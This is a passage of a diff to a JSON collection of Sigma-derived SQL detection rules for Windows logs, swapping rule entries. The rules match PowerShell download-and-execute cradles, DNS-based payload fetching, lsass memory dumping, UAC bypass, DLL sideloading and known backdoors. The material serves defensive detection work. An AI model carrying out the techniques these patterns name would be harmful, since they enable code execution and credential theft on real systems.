using ICMLuaUtil Elevated COM interface", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Users interacting with the files on their own (unlikely unless privileged users).", - "Dynatrace app" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\cacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_susp_file_permission_modifications.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Nslookup PowerShell Download Cradle - ProcessCreation", + "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "proc_creation_win_nslookup_poweshell_download.yml" }, { - "title": "Suspicious Subsystem for Linux Bash Execution", - "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", "status": "experimental", - "description": "Performs execution of specified file, can be used for defensive evasion.", - "author": "frack113", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Software installers that pull packages from remote systems and execute them" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_bash.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1059.001", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1027" + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "Net.exe Execution", - "id": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", + "title": "Process Access via TrolleyExpress Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "status": "experimental", - "description": "Detects execution of Net.exe, whether suspicious or benign.", - "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1007", - "attack.t1049", - "attack.t1018", - "attack.t1135", - "attack.t1201", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1087.001", - "attack.t1087.002", - "attack.lateral_movement", - "attack.t1021.002", - "attack.s0039" + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% group%' ESCAPE '\\' OR CommandLine LIKE '% localgroup%' ESCAPE '\\' OR CommandLine LIKE '% user%' ESCAPE '\\' OR CommandLine LIKE '% view%' ESCAPE '\\' OR CommandLine LIKE '% share%' ESCAPE '\\' OR CommandLine LIKE '% accounts%' ESCAPE '\\' OR CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_net_susp_execution.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Python Inline Command Execution", - "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.defense_evasion", + "attack.t1003.001" ], "falsepositives": [ - "Python libraries that use a flag starting with \"-c\". Filter according to your environment" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'python.exe' OR (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_python_inline_command_execution.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "title": "Potential DLL Sideloading Using Coregen.exe", + "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_side_load_coregen.yml" }, { - "title": "Files Added To An Archive Using Rar.EXE", - "id": "6f3e2987-db24-4c78-a860-b4f4095a7095", - "status": "test", - "description": "Detects usage of \"rar\" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", + "title": "Amsi.DLL Load By Uncommon Process", + "id": "facd1549-e416-48e0-b8c4-41d7215eedc8", + "status": "experimental", + "description": "Detects loading of Amsi.dll by uncommon processes", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Highly likely if rar is a default archiver in the monitored environment." + "Likely" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ngentask.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_rar_compress_data.yml" + "filename": "image_load_dll_amsi_uncommon_process.yml" }, { - "title": "Writing Of Malicious Files To The Fonts Folder", - "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", - "status": "test", - "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", - "author": "Sreeman", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", + "status": "experimental", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.t1211", - "attack.t1059", - "attack.defense_evasion", - "attack.persistence" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very likely, needs more tuning" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ "attack.execution", - "attack.t1203", "attack.privilege_escalation", - "attack.t1068" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "CMD Shell Output Redirect", - "id": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", + "title": "Potential Libvlc.DLL Sideloading", + "id": "bf9808c4-d24f-44a2-8398-b65227d406b6", "status": "experimental", - "description": "Detects the use of the redirection character \">\" to redicrect information in commandline", - "author": "frack113", + "description": "Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"", + "author": "X__Junior", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment" + "False positives are expected if VLC is installed in non-default locations" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR CommandLine LIKE '%chrome-extension://%' ESCAPE '\\' OR CommandLine LIKE '%\\\\.\\\\pipe\\\\chrome.nativeMessaging%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\libvlc.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_cmd_redirect.yml" + "filename": "image_load_side_load_libvlc.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "status": "test", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.t1047" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "DotNET Assembly DLL Loaded Via Office Application", + "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "status": "test", + "description": "Detects any assembly DLL being loaded by an Office Product", + "author": "Antonlovesdnb", + "tags": [ + "attack.execution", + "attack.t1204.002" + ], 